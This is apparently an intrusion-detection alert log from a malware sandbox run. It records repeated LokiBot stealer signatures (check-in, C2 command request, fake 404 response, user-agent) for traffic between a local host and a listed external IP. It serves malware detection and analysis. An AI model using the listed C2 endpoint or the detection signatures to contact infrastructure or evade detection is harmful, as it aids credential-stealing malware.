2024-09-25T10:20:03.909832+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49764	TCP
2024-09-25T10:20:04.071220+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:04.071220+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:04.071220+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:04.881977+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:04.881977+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:04.887903+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49765	TCP
2024-09-25T10:20:05.030104+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.030104+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.030104+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.709216+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.709216+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.714461+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49766	TCP
2024-09-25T10:20:05.858737+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:05.858737+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:05.858737+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.566813+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.566813+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.571760+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49767	TCP
2024-09-25T10:20:06.718238+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:06.718238+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:06.718238+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.429765+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.429765+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.434671+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49768	TCP
2024-09-25T10:20:07.582940+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:07.582940+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:07.582940+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.278627+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.278627+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.283551+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49769	TCP
2024-09-25T10:20:09.443638+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:09.443638+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:09.443638+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:10.191855+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:10.191855+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:10.196689+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49770	TCP
2024-09-25T10:20:10.343573+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:10.343573+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:10.343573+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.008415+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.008415+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.013287+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49771	TCP
2024-09-25T10:20:11.162336+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.162336+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.162336+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.812480+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.812480+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.817332+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49772	TCP
2024-09-25T10:20:11.972432+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:11.972432+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:11.972432+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.630621+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.630621+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.635415+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49773	TCP
2024-09-25T10:20:12.784342+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:12.784342+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:12.784342+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.435959+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.435959+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.440852+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49774	TCP
2024-09-25T10:20:13.600309+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:13.600309+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:13.600309+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.236381+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.236381+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.241223+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49775	TCP
2024-09-25T10:20:14.393221+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:14.393221+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:14.393221+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.051935+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.051935+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.056810+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49776	TCP
2024-09-25T10:20:15.204070+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:15.204070+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:15.204070+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:15.897467+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:15.897467+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:15.902727+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49777	TCP
2024-09-25T10:20:16.046849+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.046849+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.046849+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.724336+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.724336+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.729213+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49778	TCP
2024-09-25T10:20:16.874999+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:16.874999+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:16.874999+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.550653+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.550653+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.555476+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49779	TCP
2024-09-25T10:20:17.701124+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:17.701124+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:17.701124+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.430421+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.430421+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.436115+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49780	TCP
2024-09-25T10:20:18.577128+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:18.577128+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:18.577128+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.235882+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.235882+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.242304+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49781	TCP
2024-09-25T10:20:19.388646+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:19.388646+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:19.388646+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.044297+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.044297+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.049175+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49782	TCP
2024-09-25T10:20:20.429528+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:20.429528+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:20.429528+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.084561+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.084561+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.089402+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49783	TCP
2024-09-25T10:20:21.233233+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:21.233233+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:21.233233+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:21.896883+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:21.896883+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:21.901715+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49784	TCP
2024-09-25T10:20:22.045367+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.045367+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.045367+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.717675+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.717675+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.722686+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49785	TCP
2024-09-25T10:20:22.876653+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:22.876653+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:22.876653+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.537060+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.537060+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.542018+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49786	TCP
2024-09-25T10:20:23.686182+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:23.686182+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:23.686182+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.398012+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.398012+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.402809+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49787	TCP
2024-09-25T10:20:24.545070+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:24.545070+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:24.545070+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.366305+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.366305+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.371419+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49788	TCP
2024-09-25T10:20:25.516198+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:25.516198+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:25.516198+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:26.202166+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:26.202166+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:26.208265+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49789	TCP
2024-09-25T10:20:26.367186+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:26.367186+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:26.367186+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.025481+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.025481+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.030372+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49790	TCP
2024-09-25T10:20:27.187595+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:27.187595+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:27.187595+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:27.837448+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:27.837448+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:27.842255+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49791	TCP
2024-09-25T10:20:28.005117+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.005117+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.005117+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.650735+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.650735+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.655543+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49792	TCP
2024-09-25T10:20:28.823348+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:28.823348+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:28.823348+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.642863+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.642863+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.647628+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49793	TCP
2024-09-25T10:20:29.793057+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:29.793057+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:29.793057+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.571474+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.571474+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.576547+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49794	TCP
2024-09-25T10:20:30.724248+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:30.724248+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:30.724248+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.377167+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.377167+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.382078+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49795	TCP
2024-09-25T10:20:31.529840+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:31.529840+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:31.529840+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.191160+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.191160+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.195932+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49796	TCP
2024-09-25T10:20:32.349270+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:32.349270+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:32.349270+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.000475+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.000475+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.006817+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49797	TCP
2024-09-25T10:20:33.159073+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:33.159073+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:33.159073+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:33.843258+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49798	188.114.97.3	80	TCP
